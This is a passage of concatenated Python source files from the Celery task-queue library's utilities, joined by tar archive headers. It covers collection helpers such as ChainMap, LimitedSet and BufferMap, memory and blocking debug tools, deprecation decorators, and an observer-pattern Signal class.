import time from collections import OrderedDict as _OrderedDict from collections import deque from collections.abc import (Callable, Mapping, MutableMapping, MutableSet, Sequence) from heapq import heapify, heappop, heappush from itertools import chain, count from queue import Empty from typing import Any, Dict, Iterable, List from .functional import first, uniq from .text import match_case try: # pypy: dicts are ordered in recent versions from __pypy__ import reversed_dict as _dict_is_ordered except ImportError: _dict_is_ordered = None try: from django.utils.functional import LazyObject, LazySettings except ImportError: class LazyObject: pass LazySettings = LazyObject __all__ = ( 'AttributeDictMixin', 'AttributeDict', 'BufferMap', 'ChainMap', 'ConfigurationView', 'DictAttribute', 'Evictable', 'LimitedSet', 'Messagebuffer', 'OrderedDict', 'force_mapping', 'lpmerge', ) REPR_LIMITED_SET = """\ <{name}({size}): maxlen={0.maxlen}, expires={0.expires}, minlen={0.minlen}>\ """ def force_mapping(m): # type: (Any) -> Mapping """Wrap object into supporting the mapping interface if necessary.""" if isinstance(m, (LazyObject, LazySettings)): m = m._wrapped return DictAttribute(m) if not isinstance(m, Mapping) else m def lpmerge(L, R): # type: (Mapping, Mapping) -> Mapping """In place left precedent dictionary merge. Keeps values from `L`, if the value in `R` is :const:`None`. """ setitem = L.__setitem__ [setitem(k, v) for k, v in R.items() if v is not None] return L class OrderedDict(_OrderedDict): """Dict where insertion order matters.""" def _LRUkey(self): # type: () -> Any # return value of od.keys does not support __next__, # but this version will also not create a copy of the list. return next(iter(self.keys())) if not hasattr(_OrderedDict, 'move_to_end'): if _dict_is_ordered: # pragma: no cover def move_to_end(self, key, last=True): # type: (Any, bool) -> None if not last: # we don't use this argument, and the only way to # implement this on PyPy seems to be O(n): creating a # copy with the order changed, so we just raise. raise NotImplementedError('no last=True on PyPy') self[key] = self.pop(key) else: def move_to_end(self, key, last=True): # type: (Any, bool) -> None link = self._OrderedDict__map[key] link_prev = link[0] link_next = link[1] link_prev[1] = link_next link_next[0] = link_prev root = self._OrderedDict__root if last: last = root[0] link[0] = last link[1] = root last[1] = root[0] = link else: first_node = root[1] link[0] = root link[1] = first_node root[1] = first_node[0] = link class AttributeDictMixin: """Mixin for Mapping interface that adds attribute access. I.e., `d.key -> d[key]`). """ def __getattr__(self, k): # type: (str) -> Any """`d.key -> d[key]`.""" try: return self[k] except KeyError: raise AttributeError( f'{type(self).__name__!r} object has no attribute {k!r}') def __setattr__(self, key, value): # type: (str, Any) -> None """`d[key] = value -> d.key = value`.""" self[key] = value class AttributeDict(dict, AttributeDictMixin): """Dict subclass with attribute access.""" class DictAttribute: """Dict interface to attributes. 
`obj[k] -> obj.k` `obj[k] = val -> obj.k = val` """ obj = None def __init__(self, obj): # type: (Any) -> None object.__setattr__(self, 'obj', obj) def __getattr__(self, key): # type: (Any) -> Any return getattr(self.obj, key) def __setattr__(self, key, value): # type: (Any, Any) -> None return setattr(self.obj, key, value) def get(self, key, default=None): # type: (Any, Any) -> Any try: return self[key] except KeyError: return default def setdefault(self, key, default=None): # type: (Any, Any) -> None if key not in self: self[key] = default def __getitem__(self, key): # type: (Any) -> Any try: return getattr(self.obj, key) except AttributeError: raise KeyError(key) def __setitem__(self, key, value): # type: (Any, Any) -> Any setattr(self.obj, key, value) def __contains__(self, key): # type: (Any) -> bool return hasattr(self.obj, key) def _iterate_keys(self): # type: () -> Iterable return iter(dir(self.obj)) iterkeys = _iterate_keys def __iter__(self): # type: () -> Iterable return self._iterate_keys() def _iterate_items(self): # type: () -> Iterable for key in self._iterate_keys(): yield key, getattr(self.obj, key) iteritems = _iterate_items def _iterate_values(self): # type: () -> Iterable for key in self._iterate_keys(): yield getattr(self.obj, key) itervalues = _iterate_values items = _iterate_items keys = _iterate_keys values = _iterate_values MutableMapping.register(DictAttribute) class ChainMap(MutableMapping): """Key lookup on a sequence of maps.""" key_t = None changes = None defaults = None maps = None _observers = [] def __init__(self, *maps, **kwargs): # type: (*Mapping, **Any) -> None maps = list(maps or [{}]) self.__dict__.update( key_t=kwargs.get('key_t'), maps=maps, changes=maps[0], defaults=maps[1:], ) def add_defaults(self, d): # type: (Mapping) -> None d = force_mapping(d) self.defaults.insert(0, d) self.maps.insert(1, d) def pop(self, key, *default): # type: (Any, *Any) -> Any try: return self.maps[0].pop(key, *default) except KeyError: raise KeyError( f'Key not found in the first mapping: {key!r}') def __missing__(self, key): # type: (Any) -> Any raise KeyError(key) def _key(self, key): # type: (Any) -> Any return self.key_t(key) if self.key_t is not None else key def __getitem__(self, key): # type: (Any) -> Any _key = self._key(key) for mapping in self.maps: try: return mapping[_key] except KeyError: pass return self.__missing__(key) def __setitem__(self, key, value): # type: (Any, Any) -> None self.changes[self._key(key)] = value def __delitem__(self, key): # type: (Any) -> None try: del self.changes[self._key(key)] except KeyError: raise KeyError(f'Key not found in first mapping: {key!r}') def clear(self): # type: () -> None self.changes.clear() def get(self, key, default=None): # type: (Any, Any) -> Any try: return self[self._key(key)] except KeyError: return default def __len__(self): # type: () -> int return len(set().union(*self.maps)) def __iter__(self): return self._iterate_keys() def __contains__(self, key): # type: (Any) -> bool key = self._key(key) return any(key in m for m in self.maps) def __bool__(self): # type: () -> bool return any(self.maps) __nonzero__ = __bool__ # Py2 def setdefault(self, key, default=None): # type: (Any, Any) -> None key = self._key(key) if key not in self: self[key] = default def update(self, *args, **kwargs): # type: (*Any, **Any) -> Any result = self.changes.update(*args, **kwargs) for callback in self._observers: callback(*args, **kwargs) return result def __repr__(self): # type: () -> str return 
'{0.__class__.__name__}({1})'.format( self, ', '.join(map(repr, self.maps))) @classmethod def fromkeys(cls, iterable, *args): # type: (type, Iterable, *Any) -> 'ChainMap' """Create a ChainMap with a single dict created from the iterable.""" return cls(dict.fromkeys(iterable, *args)) def copy(self): # type: () -> 'ChainMap' return self.__class__(self.maps[0].copy(), *self.maps[1:]) __copy__ = copy # Py2 def _iter(self, op): # type: (Callable) -> Iterable # defaults must be first in the stream, so values in # changes take precedence. # pylint: disable=bad-reversed-sequence # Someone should teach pylint about properties. return chain(*(op(d) for d in reversed(self.maps))) def _iterate_keys(self): # type: () -> Iterable return uniq(self._iter(lambda d: d.keys())) iterkeys = _iterate_keys def _iterate_items(self): # type: () -> Iterable return ((key, self[key]) for key in self) iteritems = _iterate_items def _iterate_values(self): # type: () -> Iterable return (self[key] for key in self) itervalues = _iterate_values def bind_to(self, callback): self._observers.append(callback) keys = _iterate_keys items = _iterate_items values = _iterate_values class ConfigurationView(ChainMap, AttributeDictMixin): """A view over an applications configuration dictionaries. Custom (but older) version of :class:`collections.ChainMap`. If the key does not exist in ``changes``, the ``defaults`` dictionaries are consulted. Arguments: changes (Mapping): Map of configuration changes. defaults (List[Mapping]): List of dictionaries containing the default configuration. """ def __init__(self, changes, defaults=None, keys=None, prefix=None): # type: (Mapping, Mapping, List[str], str) -> None defaults = [] if defaults is None else defaults super().__init__(changes, *defaults) self.__dict__.update( prefix=prefix.rstrip('_') + '_' if prefix else prefix, _keys=keys, ) def _to_keys(self, key): # type: (str) -> Sequence[str] prefix = self.prefix if prefix: pkey = prefix + key if not key.startswith(prefix) else key return match_case(pkey, prefix), key return key, def __getitem__(self, key): # type: (str) -> Any keys = self._to_keys(key) getitem = super().__getitem__ for k in keys + ( tuple(f(key) for f in self._keys) if self._keys else ()): try: return getitem(k) except KeyError: pass try: # support subclasses implementing __missing__ return self.__missing__(key) except KeyError: if len(keys) > 1: raise KeyError( 'Key not found: {0!r} (with prefix: {0!r})'.format(*keys)) raise def __setitem__(self, key, value): # type: (str, Any) -> Any self.changes[self._key(key)] = value def first(self, *keys): # type: (*str) -> Any return first(None, (self.get(key) for key in keys)) def get(self, key, default=None): # type: (str, Any) -> Any try: return self[key] except KeyError: return default def clear(self): # type: () -> None """Remove all changes, but keep defaults.""" self.changes.clear() def __contains__(self, key): # type: (str) -> bool keys = self._to_keys(key) return any(any(k in m for k in keys) for m in self.maps) def swap_with(self, other): # type: (ConfigurationView) -> None changes = other.__dict__['changes'] defaults = other.__dict__['defaults'] self.__dict__.update( changes=changes, defaults=defaults, key_t=other.__dict__['key_t'], prefix=other.__dict__['prefix'], maps=[changes] + defaults ) class LimitedSet: """Kind-of Set (or priority queue) with limitations. Good for when you need to test for membership (`a in set`), but the set should not grow unbounded. 
``maxlen`` is enforced at all times, so if the limit is reached we'll also remove non-expired items. You can also configure ``minlen``: this is the minimal residual size of the set. All arguments are optional, and no limits are enabled by default. Arguments: maxlen (int): Optional max number of items. Adding more items than ``maxlen`` will result in immediate removal of items sorted by oldest insertion time. expires (float): TTL for all items. Expired items are purged as keys are inserted. minlen (int): Minimal residual size of this set. .. versionadded:: 4.0 Value must be less than ``maxlen`` if both are configured. Older expired items will be deleted, only after the set exceeds ``minlen`` number of items. data (Sequence): Initial data to initialize set with. Can be an iterable of ``(key, value)`` pairs, a dict (``{key: insertion_time}``), or another instance of :class:`LimitedSet`. Example: >>> s = LimitedSet(maxlen=50000, expires=3600, minlen=4000) >>> for i in range(60000): ... s.add(i) ... s.add(str(i)) ... >>> 57000 in s # last 50k inserted values are kept True >>> '10' in s # '10' did expire and was purged from set. False >>> len(s) # maxlen is reached 50000 >>> s.purge(now=time.monotonic() + 7200) # clock + 2 hours >>> len(s) # now only minlen items are cached 4000 >>>> 57000 in s # even this item is gone now False """ max_heap_percent_overload = 15 def __init__(self, maxlen=0, expires=0, data=None, minlen=0): # type: (int, float, Mapping, int) -> None self.maxlen = 0 if maxlen is None else maxlen self.minlen = 0 if minlen is None else minlen self.expires = 0 if expires is None else expires self._data = {} self._heap = [] if data: # import items from data self.update(data) if not self.maxlen >= self.minlen >= 0: raise ValueError( 'minlen must be a positive number, less or equal to maxlen.') if self.expires < 0: raise ValueError('expires cannot be negative!') def _refresh_heap(self): # type: () -> None """Time consuming recreating of heap. Don't run this too often.""" self._heap[:] = [entry for entry in self._data.values()] heapify(self._heap) def _maybe_refresh_heap(self): # type: () -> None if self._heap_overload >= self.max_heap_percent_overload: self._refresh_heap() def clear(self): # type: () -> None """Clear all data, start from scratch again.""" self._data.clear() self._heap[:] = [] def add(self, item, now=None): # type: (Any, float) -> None """Add a new item, or reset the expiry time of an existing item.""" now = now or time.monotonic() if item in self._data: self.discard(item) entry = (now, item) self._data[item] = entry heappush(self._heap, entry) if self.maxlen and len(self._data) >= self.maxlen: self.purge() def update(self, other): # type: (Iterable) -> None """Update this set from other LimitedSet, dict or iterable.""" if not other: return if isinstance(other, LimitedSet): self._data.update(other._data) self._refresh_heap() self.purge() elif isinstance(other, dict): # revokes are sent as a dict for key, inserted in other.items(): if isinstance(inserted, (tuple, list)): # in case someone uses ._data directly for sending update inserted = inserted[0] if not isinstance(inserted, float): raise ValueError( 'Expecting float timestamp, got type ' f'{type(inserted)!r} with value: {inserted}') self.add(key, inserted) else: # XXX AVOID THIS, it could keep old data if more parties # exchange them all over and over again for obj in other: self.add(obj) def discard(self, item): # type: (Any) -> None # mark an existing item as removed. If KeyError is not found, pass. 
self._data.pop(item, None) self._maybe_refresh_heap() pop_value = discard def purge(self, now=None): # type: (float) -> None """Check oldest items and remove them if needed. Arguments: now (float): Time of purging -- by default right now. This can be useful for unit testing. """ now = now or time.monotonic() now = now() if isinstance(now, Callable) else now if self.maxlen: while len(self._data) > self.maxlen: self.pop() # time based expiring: if self.expires: while len(self._data) > self.minlen >= 0: inserted_time, _ = self._heap[0] if inserted_time + self.expires > now: break # oldest item hasn't expired yet self.pop() def pop(self, default=None): # type: (Any) -> Any """Remove and return the oldest item, or :const:`None` when empty.""" while self._heap: _, item = heappop(self._heap) try: self._data.pop(item) except KeyError: pass else: return item return default def as_dict(self): # type: () -> Dict """Whole set as serializable dictionary. Example: >>> s = LimitedSet(maxlen=200) >>> r = LimitedSet(maxlen=200) >>> for i in range(500): ... s.add(i) ... >>> r.update(s.as_dict()) >>> r == s True """ return {key: inserted for inserted, key in self._data.values()} def __eq__(self, other): # type: (Any) -> bool return self._data == other._data def __ne__(self, other): # type: (Any) -> bool return not self.__eq__(other) def __repr__(self): # type: () -> str return REPR_LIMITED_SET.format( self, name=type(self).__name__, size=len(self), ) def __iter__(self): # type: () -> Iterable return (i for _, i in sorted(self._data.values())) def __len__(self): # type: () -> int return len(self._data) def __contains__(self, key): # type: (Any) -> bool return key in self._data def __reduce__(self): # type: () -> Any return self.__class__, ( self.maxlen, self.expires, self.as_dict(), self.minlen) def __bool__(self): # type: () -> bool return bool(self._data) __nonzero__ = __bool__ # Py2 @property def _heap_overload(self): # type: () -> float """Compute how much is heap bigger than data [percents].""" return len(self._heap) * 100 / max(len(self._data), 1) - 100 MutableSet.register(LimitedSet) class Evictable: """Mixin for classes supporting the ``evict`` method.""" Empty = Empty def evict(self): # type: () -> None """Force evict until maxsize is enforced.""" self._evict(range=count) def _evict(self, limit=100, range=range): # type: (int) -> None try: [self._evict1() for _ in range(limit)] except IndexError: pass def _evict1(self): # type: () -> None if self._evictcount <= self.maxsize: raise IndexError() try: self._pop_to_evict() except self.Empty: raise IndexError() class Messagebuffer(Evictable): """A buffer of pending messages.""" Empty = Empty def __init__(self, maxsize, iterable=None, deque=deque): # type: (int, Iterable, Any) -> None self.maxsize = maxsize self.data = deque(iterable or []) self._append = self.data.append self._pop = self.data.popleft self._len = self.data.__len__ self._extend = self.data.extend def put(self, item): # type: (Any) -> None self._append(item) self.maxsize and self._evict() def extend(self, it): # type: (Iterable) -> None self._extend(it) self.maxsize and self._evict() def take(self, *default): # type: (*Any) -> Any try: return self._pop() except IndexError: if default: return default[0] raise self.Empty() def _pop_to_evict(self): # type: () -> None return self.take() def __repr__(self): # type: () -> str return f'<{type(self).__name__}: {len(self)}/{self.maxsize}>' def __iter__(self): # type: () -> Iterable while 1: try: yield self._pop() except IndexError: break def 
__len__(self): # type: () -> int return self._len() def __contains__(self, item): # type: () -> bool return item in self.data def __reversed__(self): # type: () -> Iterable return reversed(self.data) def __getitem__(self, index): # type: (Any) -> Any return self.data[index] @property def _evictcount(self): # type: () -> int return len(self) Sequence.register(Messagebuffer) class BufferMap(OrderedDict, Evictable): """Map of buffers.""" Buffer = Messagebuffer Empty = Empty maxsize = None total = 0 bufmaxsize = None def __init__(self, maxsize, iterable=None, bufmaxsize=1000): # type: (int, Iterable, int) -> None super().__init__() self.maxsize = maxsize self.bufmaxsize = 1000 if iterable: self.update(iterable) self.total = sum(len(buf) for buf in self.items()) def put(self, key, item): # type: (Any, Any) -> None self._get_or_create_buffer(key).put(item) self.total += 1 self.move_to_end(key) # least recently used. self.maxsize and self._evict() def extend(self, key, it): # type: (Any, Iterable) -> None self._get_or_create_buffer(key).extend(it) self.total += len(it) self.maxsize and self._evict() def take(self, key, *default): # type: (Any, *Any) -> Any item, throw = None, False try: buf = self[key] except KeyError: throw = True else: try: item = buf.take() self.total -= 1 except self.Empty: throw = True else: self.move_to_end(key) # mark as LRU if throw: if default: return default[0] raise self.Empty() return item def _get_or_create_buffer(self, key): # type: (Any) -> Messagebuffer try: return self[key] except KeyError: buf = self[key] = self._new_buffer() return buf def _new_buffer(self): # type: () -> Messagebuffer return self.Buffer(maxsize=self.bufmaxsize) def _LRUpop(self, *default): # type: (*Any) -> Any return self[self._LRUkey()].take(*default) def _pop_to_evict(self): # type: () -> None for _ in range(100): key = self._LRUkey() buf = self[key] try: buf.take() except (IndexError, self.Empty): # buffer empty, remove it from mapping. self.pop(key) else: # we removed one item self.total -= 1 # if buffer is empty now, remove it from mapping. if not len(buf): self.pop(key) else: # move to least recently used. self.move_to_end(key) break def __repr__(self): # type: () -> str return f'<{type(self).__name__}: {self.total}/{self.maxsize}>' @property def _evictcount(self): # type: () -> int return self.total ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/debug.py0000664000175000017500000001114500000000000016762 0ustar00asifasif00000000000000"""Utilities for debugging memory usage, blocking calls, etc.""" import os import sys import traceback from contextlib import contextmanager from functools import partial from pprint import pprint from celery.platforms import signals from celery.utils.text import WhateverIO try: from psutil import Process except ImportError: Process = None __all__ = ( 'blockdetection', 'sample_mem', 'memdump', 'sample', 'humanbytes', 'mem_rss', 'ps', 'cry', ) UNITS = ( (2 ** 40.0, 'TB'), (2 ** 30.0, 'GB'), (2 ** 20.0, 'MB'), (2 ** 10.0, 'KB'), (0.0, 'b'), ) _process = None _mem_sample = [] def _on_blocking(signum, frame): import inspect raise RuntimeError( f'Blocking detection timed-out at: {inspect.getframeinfo(frame)}' ) @contextmanager def blockdetection(timeout): """Context that raises an exception if process is blocking. Uses ``SIGALRM`` to detect blocking functions. 
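    Example:
        A minimal usage sketch (``run_possibly_blocking_code`` is a
        placeholder for your own callable; requires a platform with
        ``SIGALRM``)::

            from celery.utils.debug import blockdetection

            with blockdetection(10):
                run_possibly_blocking_code()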
""" if not timeout: yield else: old_handler = signals['ALRM'] old_handler = None if old_handler == _on_blocking else old_handler signals['ALRM'] = _on_blocking try: yield signals.arm_alarm(timeout) finally: if old_handler: signals['ALRM'] = old_handler signals.reset_alarm() def sample_mem(): """Sample RSS memory usage. Statistics can then be output by calling :func:`memdump`. """ current_rss = mem_rss() _mem_sample.append(current_rss) return current_rss def _memdump(samples=10): # pragma: no cover S = _mem_sample prev = list(S) if len(S) <= samples else sample(S, samples) _mem_sample[:] = [] import gc gc.collect() after_collect = mem_rss() return prev, after_collect def memdump(samples=10, file=None): # pragma: no cover """Dump memory statistics. Will print a sample of all RSS memory samples added by calling :func:`sample_mem`, and in addition print used RSS memory after :func:`gc.collect`. """ say = partial(print, file=file) if ps() is None: say('- rss: (psutil not installed).') return prev, after_collect = _memdump(samples) if prev: say('- rss (sample):') for mem in prev: say(f'- > {mem},') say(f'- rss (end): {after_collect}.') def sample(x, n, k=0): """Given a list `x` a sample of length ``n`` of that list is returned. For example, if `n` is 10, and `x` has 100 items, a list of every tenth. item is returned. ``k`` can be used as offset. """ j = len(x) // n for _ in range(n): try: yield x[k] except IndexError: break k += j def hfloat(f, p=5): """Convert float to value suitable for humans. Arguments: f (float): The floating point number. p (int): Floating point precision (default is 5). """ i = int(f) return i if i == f else '{0:.{p}}'.format(f, p=p) def humanbytes(s): """Convert bytes to human-readable form (e.g., KB, MB).""" return next( f'{hfloat(s / div if div else s)}{unit}' for div, unit in UNITS if s >= div ) def mem_rss(): """Return RSS memory usage as a humanized string.""" p = ps() if p is not None: return humanbytes(_process_memory_info(p).rss) def ps(): # pragma: no cover """Return the global :class:`psutil.Process` instance. Note: Returns :const:`None` if :pypi:`psutil` is not installed. """ global _process if _process is None and Process is not None: _process = Process(os.getpid()) return _process def _process_memory_info(process): try: return process.memory_info() except AttributeError: return process.get_memory_info() def cry(out=None, sepchr='=', seplen=49): # pragma: no cover """Return stack-trace of all active threads. See Also: Taken from https://gist.github.com/737056. 
""" import threading out = WhateverIO() if out is None else out P = partial(print, file=out) # get a map of threads by their ID so we can print their names # during the traceback dump tmap = {t.ident: t for t in threading.enumerate()} sep = sepchr * seplen for tid, frame in sys._current_frames().items(): thread = tmap.get(tid) if not thread: # skip old junk (left-overs from a fork) continue P(f'{thread.name}') P(sep) traceback.print_stack(frame, file=out) P(sep) P('LOCAL VARIABLES') P(sep) pprint(frame.f_locals, stream=out) P('\n') return out.getvalue() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/deprecated.py0000664000175000017500000000704400000000000017777 0ustar00asifasif00000000000000"""Deprecation utilities.""" import warnings from vine.utils import wraps from celery.exceptions import CDeprecationWarning, CPendingDeprecationWarning __all__ = ('Callable', 'Property', 'warn') PENDING_DEPRECATION_FMT = """ {description} is scheduled for deprecation in \ version {deprecation} and removal in version v{removal}. \ {alternative} """ DEPRECATION_FMT = """ {description} is deprecated and scheduled for removal in version {removal}. {alternative} """ def warn(description=None, deprecation=None, removal=None, alternative=None, stacklevel=2): """Warn of (pending) deprecation.""" ctx = {'description': description, 'deprecation': deprecation, 'removal': removal, 'alternative': alternative} if deprecation is not None: w = CPendingDeprecationWarning(PENDING_DEPRECATION_FMT.format(**ctx)) else: w = CDeprecationWarning(DEPRECATION_FMT.format(**ctx)) warnings.warn(w, stacklevel=stacklevel) def Callable(deprecation=None, removal=None, alternative=None, description=None): """Decorator for deprecated functions. A deprecation warning will be emitted when the function is called. Arguments: deprecation (str): Version that marks first deprecation, if this argument isn't set a ``PendingDeprecationWarning`` will be emitted instead. removal (str): Future version when this feature will be removed. alternative (str): Instructions for an alternative solution (if any). description (str): Description of what's being deprecated. 
""" def _inner(fun): @wraps(fun) def __inner(*args, **kwargs): from .imports import qualname warn(description=description or qualname(fun), deprecation=deprecation, removal=removal, alternative=alternative, stacklevel=3) return fun(*args, **kwargs) return __inner return _inner def Property(deprecation=None, removal=None, alternative=None, description=None): """Decorator for deprecated properties.""" def _inner(fun): return _deprecated_property( fun, deprecation=deprecation, removal=removal, alternative=alternative, description=description or fun.__name__) return _inner class _deprecated_property: def __init__(self, fget=None, fset=None, fdel=None, doc=None, **depreinfo): self.__get = fget self.__set = fset self.__del = fdel self.__name__, self.__module__, self.__doc__ = ( fget.__name__, fget.__module__, fget.__doc__, ) self.depreinfo = depreinfo self.depreinfo.setdefault('stacklevel', 3) def __get__(self, obj, type=None): if obj is None: return self warn(**self.depreinfo) return self.__get(obj) def __set__(self, obj, value): if obj is None: return self if self.__set is None: raise AttributeError('cannot set attribute') warn(**self.depreinfo) self.__set(obj, value) def __delete__(self, obj): if obj is None: return self if self.__del is None: raise AttributeError('cannot delete attribute') warn(**self.depreinfo) self.__del(obj) def setter(self, fset): return self.__class__(self.__get, fset, self.__del, **self.depreinfo) def deleter(self, fdel): return self.__class__(self.__get, self.__set, fdel, **self.depreinfo) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4957514 celery-5.2.3/celery/utils/dispatch/0000775000175000017500000000000000000000000017117 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/dispatch/__init__.py0000664000175000017500000000011200000000000021222 0ustar00asifasif00000000000000"""Observer pattern.""" from .signal import Signal __all__ = ('Signal',) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/dispatch/signal.py0000664000175000017500000003244300000000000020754 0ustar00asifasif00000000000000"""Implementation of the Observer pattern.""" import sys import threading import warnings import weakref from weakref import WeakMethod from kombu.utils.functional import retry_over_time from celery.exceptions import CDeprecationWarning from celery.local import PromiseProxy, Proxy from celery.utils.functional import fun_accepts_kwargs from celery.utils.log import get_logger from celery.utils.time import humanize_seconds __all__ = ('Signal',) logger = get_logger(__name__) def _make_id(target): # pragma: no cover if isinstance(target, Proxy): target = target._get_current_object() if isinstance(target, (bytes, str)): # see Issue #2475 return target if hasattr(target, '__func__'): return id(target.__func__) return id(target) def _boundmethod_safe_weakref(obj): """Get weakref constructor appropriate for `obj`. `obj` may be a bound method. Bound method objects must be special-cased because they're usually garbage collected immediately, even if the instance they're bound to persists. Returns: a (weakref constructor, main object) tuple. `weakref constructor` is either :class:`weakref.ref` or :class:`weakref.WeakMethod`. `main object` is the instance that `obj` is bound to if it is a bound method; otherwise `main object` is simply `obj. 
""" try: obj.__func__ obj.__self__ # Bound method return WeakMethod, obj.__self__ except AttributeError: # Not a bound method return weakref.ref, obj def _make_lookup_key(receiver, sender, dispatch_uid): if dispatch_uid: return (dispatch_uid, _make_id(sender)) else: return (_make_id(receiver), _make_id(sender)) NONE_ID = _make_id(None) NO_RECEIVERS = object() RECEIVER_RETRY_ERROR = """\ Could not process signal receiver %(receiver)s. Retrying %(when)s...\ """ class Signal: # pragma: no cover """Create new signal. Keyword Arguments: providing_args (List): A list of the arguments this signal can pass along in a :meth:`send` call. use_caching (bool): Enable receiver cache. name (str): Name of signal, used for debugging purposes. """ #: Holds a dictionary of #: ``{receiverkey (id): weakref(receiver)}`` mappings. receivers = None def __init__(self, providing_args=None, use_caching=False, name=None): self.receivers = [] self.providing_args = set( providing_args if providing_args is not None else []) self.lock = threading.Lock() self.use_caching = use_caching self.name = name # For convenience we create empty caches even if they are not used. # A note about caching: if use_caching is defined, then for each # distinct sender we cache the receivers that sender has in # 'sender_receivers_cache'. The cache is cleaned when .connect() or # .disconnect() is called and populated on .send(). self.sender_receivers_cache = ( weakref.WeakKeyDictionary() if use_caching else {} ) self._dead_receivers = False def _connect_proxy(self, fun, sender, weak, dispatch_uid): return self.connect( fun, sender=sender._get_current_object(), weak=weak, dispatch_uid=dispatch_uid, ) def connect(self, *args, **kwargs): """Connect receiver to sender for signal. Arguments: receiver (Callable): A function or an instance method which is to receive signals. Receivers must be hashable objects. if weak is :const:`True`, then receiver must be weak-referenceable. Receivers must be able to accept keyword arguments. If receivers have a `dispatch_uid` attribute, the receiver will not be added if another receiver already exists with that `dispatch_uid`. sender (Any): The sender to which the receiver should respond. Must either be a Python object, or :const:`None` to receive events from any sender. weak (bool): Whether to use weak references to the receiver. By default, the module will attempt to use weak references to the receiver objects. If this parameter is false, then strong references will be used. dispatch_uid (Hashable): An identifier used to uniquely identify a particular instance of a receiver. This will usually be a string, though it may be anything hashable. retry (bool): If the signal receiver raises an exception (e.g. ConnectionError), the receiver will be retried until it runs successfully. A strong ref to the receiver will be stored and the `weak` option will be ignored. 
""" def _handle_options(sender=None, weak=True, dispatch_uid=None, retry=False): def _connect_signal(fun): options = {'dispatch_uid': dispatch_uid, 'weak': weak} def _retry_receiver(retry_fun): def _try_receiver_over_time(*args, **kwargs): def on_error(exc, intervals, retries): interval = next(intervals) err_msg = RECEIVER_RETRY_ERROR % \ {'receiver': retry_fun, 'when': humanize_seconds(interval, 'in', ' ')} logger.error(err_msg) return interval return retry_over_time(retry_fun, Exception, args, kwargs, on_error) return _try_receiver_over_time if retry: options['weak'] = False if not dispatch_uid: # if there's no dispatch_uid then we need to set the # dispatch uid to the original func id so we can look # it up later with the original func id options['dispatch_uid'] = _make_id(fun) fun = _retry_receiver(fun) self._connect_signal(fun, sender, options['weak'], options['dispatch_uid']) return fun return _connect_signal if args and callable(args[0]): return _handle_options(*args[1:], **kwargs)(args[0]) return _handle_options(*args, **kwargs) def _connect_signal(self, receiver, sender, weak, dispatch_uid): assert callable(receiver), 'Signal receivers must be callable' if not fun_accepts_kwargs(receiver): raise ValueError( 'Signal receiver must accept keyword arguments.') if isinstance(sender, PromiseProxy): sender.__then__( self._connect_proxy, receiver, sender, weak, dispatch_uid, ) return receiver lookup_key = _make_lookup_key(receiver, sender, dispatch_uid) if weak: ref, receiver_object = _boundmethod_safe_weakref(receiver) receiver = ref(receiver) weakref.finalize(receiver_object, self._remove_receiver) with self.lock: self._clear_dead_receivers() for r_key, _ in self.receivers: if r_key == lookup_key: break else: self.receivers.append((lookup_key, receiver)) self.sender_receivers_cache.clear() return receiver def disconnect(self, receiver=None, sender=None, weak=None, dispatch_uid=None): """Disconnect receiver from sender for signal. If weak references are used, disconnect needn't be called. The receiver will be removed from dispatch automatically. Arguments: receiver (Callable): The registered receiver to disconnect. May be none if `dispatch_uid` is specified. sender (Any): The registered sender to disconnect. weak (bool): The weakref state to disconnect. dispatch_uid (Hashable): The unique identifier of the receiver to disconnect. """ if weak is not None: warnings.warn( 'Passing `weak` to disconnect has no effect.', CDeprecationWarning, stacklevel=2) lookup_key = _make_lookup_key(receiver, sender, dispatch_uid) disconnected = False with self.lock: self._clear_dead_receivers() for index in range(len(self.receivers)): (r_key, _) = self.receivers[index] if r_key == lookup_key: disconnected = True del self.receivers[index] break self.sender_receivers_cache.clear() return disconnected def has_listeners(self, sender=None): return bool(self._live_receivers(sender)) def send(self, sender, **named): """Send signal from sender to all connected receivers. If any receiver raises an error, the exception is returned as the corresponding response. (This is different from the "send" in Django signals. In Celery "send" and "send_robust" do the same thing.) Arguments: sender (Any): The sender of the signal. Either a specific object or :const:`None`. **named (Any): Named arguments which will be passed to receivers. Returns: List: of tuple pairs: `[(receiver, response), … ]`. 
""" responses = [] if not self.receivers or \ self.sender_receivers_cache.get(sender) is NO_RECEIVERS: return responses for receiver in self._live_receivers(sender): try: response = receiver(signal=self, sender=sender, **named) except Exception as exc: # pylint: disable=broad-except if not hasattr(exc, '__traceback__'): exc.__traceback__ = sys.exc_info()[2] logger.exception( 'Signal handler %r raised: %r', receiver, exc) responses.append((receiver, exc)) else: responses.append((receiver, response)) return responses send_robust = send # Compat with Django interface. def _clear_dead_receivers(self): # Warning: caller is assumed to hold self.lock if self._dead_receivers: self._dead_receivers = False new_receivers = [] for r in self.receivers: if isinstance(r[1], weakref.ReferenceType) and r[1]() is None: continue new_receivers.append(r) self.receivers = new_receivers def _live_receivers(self, sender): """Filter sequence of receivers to get resolved, live receivers. This checks for weak references and resolves them, then returning only live receivers. """ receivers = None if self.use_caching and not self._dead_receivers: receivers = self.sender_receivers_cache.get(sender) # We could end up here with NO_RECEIVERS even if we do check this # case in .send() prior to calling _Live_receivers() due to # concurrent .send() call. if receivers is NO_RECEIVERS: return [] if receivers is None: with self.lock: self._clear_dead_receivers() senderkey = _make_id(sender) receivers = [] for (receiverkey, r_senderkey), receiver in self.receivers: if r_senderkey == NONE_ID or r_senderkey == senderkey: receivers.append(receiver) if self.use_caching: if not receivers: self.sender_receivers_cache[sender] = NO_RECEIVERS else: # Note: we must cache the weakref versions. self.sender_receivers_cache[sender] = receivers non_weak_receivers = [] for receiver in receivers: if isinstance(receiver, weakref.ReferenceType): # Dereference the weak reference. receiver = receiver() if receiver is not None: non_weak_receivers.append(receiver) else: non_weak_receivers.append(receiver) return non_weak_receivers def _remove_receiver(self, receiver=None): """Remove dead receivers from connections.""" # Mark that the self..receivers first has dead weakrefs. If so, # we will clean those up in connect, disconnect and _live_receivers # 